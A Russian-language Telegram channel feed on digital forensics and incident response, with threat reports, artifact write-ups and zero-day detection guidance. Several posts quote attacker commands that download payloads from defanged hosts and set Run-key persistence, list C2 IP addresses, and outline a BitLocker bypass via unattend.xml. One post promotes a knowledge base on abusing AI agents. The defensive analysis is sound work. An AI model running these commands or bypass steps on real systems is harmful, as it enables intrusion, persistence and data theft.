DFIR Father
480 subscribers
48 photos
2 files
32 links
🕵🏻‍♂️ Focused entirely on Digital Forensics and Incident Response.
👀 Sharing tools, techniques, and practical cases for DFIR professionals.

👨🏻‍💻 Author: @sepi0lh4ze

https://t.me/boost/DFIRFather
Download Telegram
Cavalry Werewolf: целевая атака на госсектор РФ

⚙️ Формат атаки
🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS).
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe
Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php.
Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.

🧠 Цели и действия атакующего
Атакующие проводят ручную разведку через cmd.exe:
whoami
ipconfig /all
net user
dir C:\Users\<user>\Downloads
dir C:\Users\Public\Pictures
Проверяют сетевые прокси:
[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")
Загружают новые модули через PowerShell и curl:
powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe"
curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe
Закрепление через Run-ключ:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f
Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe.

🧩 Инструменты Cavalry Werewolf
BackDoor.ShellNET.1 / .2
— C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang), revv2.exe -connect IP:10443.
Trojan.Inject5.57968 — инжект в aspnet_compiler.exe, шифрование RC2 / AES, C2.
Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в %APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах.

⛓️‍💥Типовая цепочка действий
1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл).
2️⃣ Разведка: whoami / ipconfig / net user.
3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl.
4️⃣ Закрепление через Run-ключ или планировщик.
5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe.
6️⃣ Создание туннелей и Telegram-C2.
7️⃣ Эксфильтрация документов, удаление следов.

🧠 Тактические наблюдения
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка: bitsadminpowershellcmd.exe.
Хранение и запуск из C:\Users\Public\Pictures|Libraries|Downloads.
Переход от разведки к туннелям и долговременному C2 в одном цикле.

🔍 Что отслеживать
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на C:\Users\Public\.
• Трафик к api.telegram.org или подозрительным IP

🔗https://news.drweb.ru/show/?i=15078
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥3
🔍 TrustFall & MystRodX:

Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигурируют два связанных инструмента — TrustFall и MystRodX.
Они отдельно отметили, что о схожем вредоносе ранее писали аналитики QAX (@RedDrip7), которые использовали название MystRodX для такого же типа атаки.
По данным ГТС, это звенья одной кампании, наблюдавшейся в 2025 году.

🧩 TrustFall (март 2025)
Лёгкий backdoor: выполняет команды через /bin/sh, пакует данные (tar -czvf), удаляет следы (rm -rf) и отправляет информацию через POST на /news/data_form.php. Использует фиксированные C2 и позже — шифрование.

🧩 MystRodX (август 2025)
Более новая стадия той же линии: обновлённый модуль с другим форматом сетевого обмена, зашифрованным трафиком и расширенной C2-инфраструктурой. Распространялся через 139.84.156.79.

🗃 IOC
185.154.154.135
213.159.64.6
2.56.177.181
37.221.125.201
5.252.22.232
45.14.244.110
45.83.140.218
154.196.162.76
Сервер распространения
139.84.156.79
Конфигурационные файлы
tcbipkrn.config → 185.154.154.135
baeeajzb.config → 213.159.64.6
URI
/news/data_form.php
Поведенческие признаки
tar -czvf
rm -rf
/bin/sh -c "<command>"
шифрование трафика (в поздней активности)
смена канала управления

🎯 APT группы:
STA-2201
Группа, впервые замеченная в 2019, работает по двум направлениям:
Initial Access Broker (первичный доступ)
Классическая APT-активность: кража и эксфильтрация данных
Позже стала действовать более скрытно.
Сектора: госуправление, телеком.

STA-2404
Продвинутая хакерская группа, образованная после структурных изменений (детали скрыты).
Активность отслеживается с 2024 года (две волны).
Сектора: госуправление, энергетика, здравоохранение, наука, транспорт, финансы.


🔗 Ссылки
• Презентация: https://profitday.kz/pdf/security2025/15.pdf
sts.kz
• Запись выступления: https://www.youtube.com/live/8eueDGkMMlo?t=26395
https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
AI как Living-off-the-Land

Звучит классно?)
Вот и разговор с https://t.me/s0ld13r_ch был довольно интересным на эту тему, в результате дискуссии родился проект, LOLAI нечто похожее на LOLBins / LOLBAS / LOLDrivers.

LOLAI проект для тех кто хочет чтобы за него все сделал AI
LOLAI это база знаний которая описывает:
• векторы атак с использованием ИИ агентов
• способы злоупотребления легитимными агентами и API
• detection opportunity / hunting use cases

Если есть интересный агент который можно использовать для Red Team/Adversary Emulation, feel free to contribute будем только рады ☺️

Ну а пока читай что мы собрали и пробуй хантить в своей инфраструктуре 😈

🖱🔜 lolai-project.github.io

🦔 THF

Максимальный репост друзья, дадим жизнь проекту‼️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Forwarded from SecuriXy.kz
🕵️ IRFlow Timeline - интерактивный таймлайн для DFIR-расследований

Десктопное приложение на Electron для анализа больших форензик-таймлайнов. Работает полностью офлайн, тянет таймлайны на 30-50+ ГБ и 800k+ строк через SQLite с виртуальной прокруткой.
Если разгребаете артефакты после инцидента (KAPE, Plaso, EVTX) и Excel уже сильно задумывается - стоит взять на заметку.

📖 Что умеет:
🔎 Поиск в трех режимах - text, regex, fuzzy (с толерантностью к опечаткам)
📊 Гистограмма событий по минутам с динамическим burst-детектом
🌳 Process Inspector - дерево процессов из Sysmon EID 1 с разметкой MITRE ATT&CK
🕸 Lateral Movement Tracker - граф перемещений между хостами с outlier-детектом (KALI, PARROT, WIN-XXXXX)
🏷 Bookmarks, tags, color rules для выделения аномалий
🦠 VirusTotal enrichment с локальным SQLite-кэшем
📁 NTFS-модули: ransomware analysis, timestomping (SI vs FN), ADS analyzer, USN Journal по 11 категориям

📦 Под капотом: Electron + React, движок на better-sqlite3, стриминговые парсеры для каждого формата. Поддержка CSV, XLSX, XLS, EVTX, Plaso, $MFT, $J (USN Journal). Авто-детект 24 KAPE-профилей с преднастроенной раскладкой колонок. FTS5 индекс под полнотекст, кастомные SQL-функции для regex и fuzzy-матча.

🛡 Применение: Ransomware-расследования, APT/lateral movement, timeline analysis после KAPE-выгрузок, быстрый разбор EVTX без выгрузки в SIEM. Все локально - подходит для закрытых контуров и данных под NDA.

🔗 https://github.com/r3nzsec/irflow-timeline
#dfir #forensics #tools #incident #response
🔥2👍1
yoprst_Грищенко_16777216.pdf
7.1 MB
🔍 ::%16777216 — это не ngrok-артефакт. Это баг Windows.

Если ты занимаешься DFIR или threat hunting'ом - ты наверняка встречал в логах Windows Event ID 1149 (TerminalServices-RemoteConnectionManager) адрес источника вида ::% 16777216 и думал, что это след ngrok или другого туннелирующего инструмента. Так вот - это не так. Точнее, не совсем так.

🐛 Что происходит на самом деле
Это баг в Windows, существующий как минимум с Windows 8 / Server 2012 и не исправленный вплоть до Windows 11 24H2 build 26100.8457.
Суть: при RDP-подключении через IPv6 termsrv.dll передаёт в GetNameInfoW (ws2_32.dll) указатель на структуру WTS_SOCKADDR - но читает её как sockaddr_in6. Проблема в несоответствии: WTS_SOCKADDR содержит 4 байта паддинга после sin_family, из-за чего IPv6-адрес клиента сдвигается на 4 байта вправо. В результате вместо реального адреса в лог пишется ::% 16777216, где 16777216 = 0x01000000 - это значение sin6_scope_id, которое интерпретируется как zone index от сдвинутого ::1 (localhost IPv6).

⚙️ Структуры для понимания
WTS_SOCKADDR:
USHORT sin_family;   // 2 байта
// padding // 2 байта ← вот виновник
union { ... } // от offset 4

sockaddr_in6:
short  sin6_family;  // 2 байта
u_short sin6_port; // 2 байта
u_long sin6_flowinfo;// 4 байта
struct in6_addr ... // 16 байт
u_long sin6_scope_id;// 4 байта

rdpcorets.dll записывает IPv6-адрес клиента в WTS_SOCKADDR с одной структурой. termsrv.dll читает это как sockaddr_in6 с другой - смещение на 4 байта, адрес уезжает в sin6_scope_id, который и попадает в лог как % 16777216.

🧪 Как воспроизвести
Любой туннелинг через IPv6 на localhost (ssh -L, devtunnel, ngrok, localtunnel) → RDP-подключение → в Event ID 1149 будет ::% 16777216.
Это происходит не только с ngrok. Любое RDP-подключение через IPv6 localhost даст этот артефакт.

📋 Где проявляется
Event IDs: 1149, 4778, 4779 Журналы: TerminalServices-RemoteConnectionManager\Operational, Windows Logs\Security

🔧 Как восстановить реальный IPv6-адрес
Если в логе: 0:0:fe80::6e1d:980d%2607874452
Берём число после %: 2607874452
Конвертируем в HEX: 9B 71 01 94
Разворачиваем (little-endian): 94 01 71 9B
Дописываем к адресу справа: fe80::6e1d:980d:9401:719b
Реализуемо в любом SIEM через enrichment-правило.

📌 Выводы для DFIR
::% 16777216 - всегда признак RDP-подключения по IPv6 через туннель (localhost → порт 3389). Это остаётся валидным IoC для детекта reverse tunnel, независимо от того, ngrok это или ssh -L.
Значение само по себе не несёт информации о реальном клиенте - адрес нужно восстанавливать по алгоритму выше.
Microsoft квалифицировал как Moderate / Tampering, CVE не присвоен, патч не обещан (ответ от 08.11.2025). Исправлено тихо в Windows 11 24H2 build 26100.8457+ и 26H1.

🔗 Слайды: ёPRSTCON 2026, автор - Константин Грищенко, Positive Technologies.

🐦‍⬛ DFIR Father
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍2
🤖 AI нашел, а доказывать тебе.
Наткнулся на пост Бретта Шейверса (Brett Shavers), который зацепил. Если ты в DFIR и хоть как-то приглядываешься к AI - читать обязательно.
Если коротко: он собрал AI-ready машину, поднял локальную LLM, прогнал ее по тестовым данным и CTF. А результат его удивил и испугал одновременно.

⚡️ Что реально круто
Скорость. Модель пробегает данные, суммаризирует, группирует, вытаскивает аномалии - быстрее, чем человек руками. Бретт прямо говорит: кто делает вид, что эта штука не изменит DFIR, тот обманывает сам себя. И тут он прав.

☠️ А вот где засада
Как только он ушел от широкого обзора данных к вопросам уже по сути расследования, на естественном языке - посыпались фейлы. И фейлы не тупые, а правдоподобные.
Он специально скармливал модели плохие промпты и тянул ее к неверным выводам. Ответы он знал заранее, так что видел, где она врет. И она не подвела - уверенно шла в неправильную сторону, выдавая связные, убедительные ответы.
Вся проблема в том, что LLM заточена быть "helpful" и удобной, а не правдивой. Она дает тебе "ответ" и будет его защищать, даже когда он мимо.
С обычной автоматизацией (карвинг, фильтрация) ты на автомате идешь перепроверять, потому что данные сами по себе - еще не вывод. А LLM подает готовый вывод на блюде. Вот здесь и начинается опасность для дела и для карьеры.

🧠 Главная мысль
Знаешь дело, доказательную базу и пределы данных - AI разгонит тебя. Не знаешь, как примерно должен выглядеть правильный ответ - никогда не поймешь, повел он тебя верно, ошибся или просто подыграл, чтобы ты почувствовал себя умнее.
Это не "AI плохой". Это про порядок: сначала форензика, потом AI. Инструмент работает только в руках того, кто сам понимает, к чему он должен прийти.

📌 Что забрать в работу
• Не отдавай LLM решения по расследованию. Используй для ускорения там, где контекст у тебя уже в голове.
• Любой вывод модели - это гипотеза, а не факт. Подтверждай артефактами.
• Не можешь объяснить, почему AI прав - значит, в casework это тащить нельзя.
• Качай investigative mindset вне зависимости от тулзов. Инструменты меняются, данные меняются, AI меняется. Базовый навык - нет.

🔗 https://www.brettshavers.com/brett-s-blog/entry/forensics-first-ai-second

🐦‍⬛ DFIR Father
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
Текстовик в Windows 11, который палит запуск даже удаленных файлов 🔥
Иногда самые полезные артефакты лежат не в хитром бинарнике, который надо парсить три часа, а просто в текстовике, который никто не догадался открыть. Вот один из таких. Андреа Фортуна недавно напомнил про него, и для кейсов на 11 винде это очень актуально.

📂 Что это и где лежит
Начиная с Windows 11 22H2 Microsoft прикрутила к сервису Program Compatibility Assistant (тот самый PcaSvc, который живет еще со времен Vista) персистентную запись запусков в обычный текст:
C:\Windows\appcompat\pca\PcaAppLaunchDic.txt
Внутри - строки вида "полный путь к exe | UTC-таймстамп". Никакого проприетарного формата, никакого декодинга. Все читается глазами:
C:\Users\Alice\Downloads\Quarterly_Review.pdf.exe|2026-03-15 09:42:11.000
C:\Temp\tool.exe|2026-03-15 09:43:05.000
D:\AUTORUN\payload.exe|2026-03-15 09:44:22.000

Делалось это как обычно под compatibility-задачи, а не под форензику. Но как обычно бывает - фича для одного, а ценное доказательство для другого. 😙

🔍 Чем это интересно для форзы
Файл ловит запуски программ через Explorer - то есть когда юзер двойным кликом открыл файл. А это огромный пласт реальной малвари: распаковал ZIP, открыл "счет" из директории "Загрузки", оператор кинул тулзу в C:\Temp руками и запустил, техник прогнал утилиту с флешки.

Три жирных плюса:
• Отвечает на простой, но важный вопрос - этот exe реально запускали на хосте, или только скачали?
• Связывает алерт с активностью юзера.
• И главное - запись остается даже после удаления самого файла.
Третья строка в примере выше ⬆️:
D:\ - это съемный диск. То есть доставка через USB видна по одному только префиксу пути, без всякого пивотинга.

☠️ Anti-forensic значимость
Вот тут самое вкусное. Вся типовая чистка следов заточена под известные артефакты: чистят Prefetch, сносят LNK, вайпят recent items, гоняют коммерческие анти-форензик тулзы. А малоизвестные артефакты остаются нетронутыми просто потому, что атакующий о них не знает.
Представь кейс: подозрение на фишинг. Вложение удалено, скачанный файл удален, юзер божится что "только посмотрел документ и ничего не запускал". EDR дал слабый сигнал, Prefetch неинформативен из-за шума и ретеншена. Открываешь PCA - а там:
C:\Users\Alice\Downloads\Quarterly_Review.pdf.exe|2026-03-15 09:42:11.000
Одна строчка доказывает запуск (а не просто скачивание), путь с палевным двойным расширением .pdf.exe, и UTC-таймстамп, который коррелируется с почтой, браузером, DNS и process creation.

🛠 Как снимать и читать (Сам файл в UTF-16 LE, если что)
Быстрый триаж через PowerShell:
Get-Content -Path "C:\Windows\appcompat\pca\PcaAppLaunchDic.txt" -Encoding Unicode |
Select-String -Pattern "Temp|Downloads|AppData|\\Users\\"

В KAPE путь уже есть в таргете !SANS_Triage. Заодно тащи соседей - они дополняют картину ошибками совместимости и завершениями процессов:
C:\Windows\appcompat\pca\PcaAppLaunchDic.txt
C:\Windows\appcompat\pca\PcaGeneralDb0.txt
C:\Windows\appcompat\pca\PcaGeneralDb1.txt

Для парсинга в пайплайне Харлан Карви запилил PCAParse.

⚠️ Важные оговорки
Scope. Ловятся запуски ТОЛЬКО через Explorer. Стартанули из cmd, PowerShell, WMI, PsExec, шедулера или сервиса - в этом файле ничего не будет.
Наличие записи сильно намекает на запуск через Explorer. Отсутствие записи не доказывает что не запускали. Это один источник в общей доказательной базе, а не истина в последней инстанции.

🎯 Плейбучим?
Лучшее время выучить новый артефакт - до того, как он понадобится в живом кейсе. Сейчас большинство анти-форензик тулз его не трогают. Советую потыкать на Win11 самому, прогнать запуск через Explorer, cmd, PowerShell, USB и сетевую шару, посмотри что и сколько хранится. Ну и если было полезно, то закинуть C:\Windows\appcompat\pca\ в свой таргет-коллект.

🔗 https://andreafortuna.org/2026/03/19/windows11-pca-artifact/
🔗 https://www.sygnia.co/blog/new-windows-11-pca-artifact/
🔗 https://windowsir.blogspot.com/2024/02/pcaparse.html

🐦‍⬛ DFIR Father
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥92👍1
🆕 RoguePlanet - свежий 0-day в Microsoft Defender. Что там с точки зрения DFIR?)

🔥 Буквально вчера исследователь под ником Nightmare Eclipse выкатил PoC нового 0-day для Microsoft Defender - RoguePlanet. Он бьет по полностью пропатченным Windows 10 и 11, включая системы с июньскими апдейтами (KB5094126). На выходе - cmd.exe с правами SYSTEM. Как я понял, релиз - часть затяжного конфликта автора с Microsoft по поводу их практик disclosure и bug bounty.
Нам как форзерам это интересно не тем, КАК эксплуатировать, а тем, КАКОЙ след оно оставляет и как это детектить. 🔍

⚙️ Что под капотом?
• Это Time-of-Check to Time-of-Use в движке Defender (mpengine). Автор сам пишет, что на одних машинах 100% успех, на других не заводится вообще.
• Изначально это была RCE: жертву надо было заманить открыть .vhd(x) с удаленной SMB-шары, дальше Defender перезаписывал собственные файлы - и привет, выполнение кода 👀
• Второй сценарий RCE - открытие SMB-шары при включенной обработке симлинков.
• В середине мая MS тихо захарденил Defender, пропатчив mpengine!SysIO* и прикрыв junction-атаки. После этого RoguePlanet, по словам автора, возможно скатился до LPE.
• ThreatLocker подтвердили, что воспроизвели эксплойт на полностью пропатченной Win11. Application allowlisting его блокирует.
• Ключевой момент для нас: MsMpEng.exe (движок Defender) крутится под SYSTEM. Гонка в том, как он обрабатывает файлы / симлинки / reparse-поинты во время сканирования, позволяет заставить его действовать по контролируемому атакующим пути с правами SYSTEM. Отсюда перезапись файлов и эскалация.

🔍 Теперь, самое интересное, где это палится?
1️⃣ Аномальные дочерние процессы MsMpEng.exe. Движок Defender в норме НЕ порождает cmd.exe / powershell.exe / conhost. Если в Sysmon EID 1 видишь ParentImage, заканчивающийся на MsMpEng.exe, а в детях интерактивный шелл - это практически нулевой false positive. Первое, что надо завести в детект.
2️⃣ Монтирование VHD/VHDX из недоверенных мест.
Microsoft-Windows-VHDMP/Operational - события attach/surface образа.
• Открытие .vhd(x) с UNC-пути, WebDAV или SMB-шары - смотри командные строки и Explorer-активность.
• Коррелируй с Microsoft-Windows-SMBClient/Connectivity и логами доступа к шаре. VHD(x) с удаленной шары + следом активность Defender = красный флаг под этот сценарий.
3️⃣ Целостность каталога Defender. Перезапись собственных файлов Defender - часть механики. Ставь file integrity monitoring на: C:\ProgramData\Microsoft\Windows Defender\Platform\. Неожиданные модификации/перезаписи бинарей платформы не-Defender-процессом - повод копать.
4️⃣ Reparse points / junctions как индикатор. Создание junction/symlink в путях, которые сканирует Defender, с последующими быстрыми файловыми операциями - поведенческий признак TOCTOU. Sysmon FileCreate + аномальная плотность операций по таймстампам.
5️⃣ Краши и рестарты mpengine
• WER-отчеты по MsMpEng.exe.
• Рестарты сервиса Defender, ошибки в Microsoft-Windows-Windows Defender/Operational. Гонка штука нестабильная - неудачные попытки часто роняют или дергают движок, и это само по себе сигнал.

🧰 Триаж-чеклист на хосте
• Дерево процессов вокруг MsMpEng.exe (родитель/дети) за окно инцидента.
• VHDMP/Operational + SMBClient логи на предмет remote VHD(x).
• Таймлайн модификаций в ...\Windows Defender\Platform\.
• Шелл из-под SYSTEM с подозрительным parent.
• Новые админ-аккаунты, сервисы, задачи планировщика сразу после получения SYSTEM (стандартный post-exp, ну и дальше по цепочке).

📌 Самый дешевый и надежный детект - дочерний шелл от MsMpEng.exe, думаю можно заводить прямо сейчас. А остальное (remote VHD, целостность Platform, краши движка) идет вторым контуром под корреляцию.

🔗 https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-rogueplanet-zero-day-grants-system-privileges/
🔗 https://github.com/MSNightmare/RoguePlanet

🐦‍⬛ DFIR Father
Please open Telegram to view this post
VIEW IN TELEGRAM
48👍4
❗️❗️❗️ GreatXML - второй 0-day за месяц от Nightmare Eclipse. На этот раз BitLocker
"I may have just made the Greatest XML in all of XML history. Two zerodays this month, hope I can do more next month" - Nightmare Eclipse

🤪 Помните вчерашнего исследователя, который выкатил RoguePlanet?)
Так вот, он не стал ждать следующего месяца. Второй публичный 0-day - GreatXML. 😳
И это уже BitLocker bypass. Полностью через unattend.xml в разделе восстановления.

⚙️ Как это работает (*FOR EDUCATIONAL PURPOSES*)
Механика элегантно простая - без эксплойтов в классическом смысле, чистая злоупотреблением легитимным механизмом Windows:
1. Копируешь unattend.xml и папку Recovery в корень раздела восстановления (WinRE).
2. Ребутишь машину в WinRE через Shift + Restart.
3. Если на машине когда-либо запускался Defender Offline Scan - логин не нужен вообще. Машина сразу уязвима.
4. На выходе - шелл с неограниченным доступом к BitLocker-тому. Шифрование фактически не защищает данные.
❗️ Ключевой момент: unattend.xml - это легитимный файл автоматизации установки Windows (Unattended Setup). WinRE его подхватывает и обрабатывает с привилегиями, достаточными для обхода BitLocker. Microsoft не считает это проблемой на уровне своих текущих критериев - и поэтому патча пока нет.

🔍 Чем это полезно для форзеров?
Для нас тут несколько интересных вещей:

1️⃣ Первое - физический доступ, но с нюансом. Классический аргумент "если у атакующего физический доступ к машине, игра окончена" тут работает, но с оговоркой: вектор через Defender Offline Scan делает машину уязвимой даже если сам атакующий не инициировал scan. Достаточно что его когда-либо запускал пользователь или администратор.

2️⃣ Второе - артефакты в WinRE. Если атака произошла, следы будут именно там. После эксплуатации смотреть на:
• Раздел WinRE на предмет посторонних файлов - unattend.xml и папка Recovery в корне раздела восстановления там быть не должны в штатной конфигурации.
• Логи переходов в WinRE: Microsoft-Windows-Diagnostics-Performance/Operational, события загрузки в System лог.
• Если был физический доступ - смотри на временные метки файлов в разделе восстановления и коррелируй с последним временем работы системы.

3️⃣ Третье - BitLocker-том был смонтирован. После получения доступа к тому атакующий мог читать/копировать файлы. Индикаторы на уровне файловой системы: временные метки последнего доступа к файлам (Last Accessed), артефакты подключения внешних носителей (если данные копировались), USN Journal на предмет операций чтения/копирования в интересующем временном окне.

4️⃣Четвертое - Defender Offline Scan как пре-условие. Факт его запуска фиксируется: Microsoft-Windows-Windows Defender/Operational, Event ID 2050 (scan started). Если в ходе расследования ты видишь что Offline Scan запускался - машина потенциально была уязвима к этому вектору в любой момент после этого.

🛡 Что делать прямо сейчас
• Проверить конфигурацию WinRE на прод-тачках - в разделе восстановления посторонних XML и папок быть не должно.
• Убедиться что физический доступ к машинам ограничен (банально, но именно здесь и решается).
• Включить BitLocker PIN при загрузке (не только TPM) - это усложняет вектор через WinRE, так как требует дополнительной аутентификации до этапа где отрабатывает уязвимость.
• Если Secure Boot + UEFI password настроены - это дополнительный барьер против загрузки в модифицированный WinRE.

⁉️ Два 0-day за месяц от одного исследователя - это уже заявка. Причем оба без CVE и без патча на момент публикации. MS закрыл GreenPlasma и YellowKey (предыдущая серия), но GreatXML и RoguePlanet пока висят открытыми. Nightmare Eclipse прямо говорит что продолжит - ну следим, чо)

Ну и с вас реакция за реактивный разбор уязы (на момент написания поста прошло 13 часов с момента публикации) 🙊

🔗 https://github.com/MSNightmare/GreatXML

🐦‍⬛ DFIR Father
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥731👍1
A localhost digital-forensics / incident-response companion. A browser extension captures screenshots of your investigation (Velociraptor, EDR/SIEM dashboards, Security Onion, Splunk4DFIR, VolWeb, VirusTotal, etc.) as evidence; a local server stores them, runs windowed AI vision analysis into an accumulating per-case investigation state, and serves a live dashboard plus exportable reports.
Everything runs on your machine - the companion binds to 127.0.0.1 only, evidence stays on disk, and the AI provider is yours to choose.


https://github.com/hasamba/DFIR-Companion
6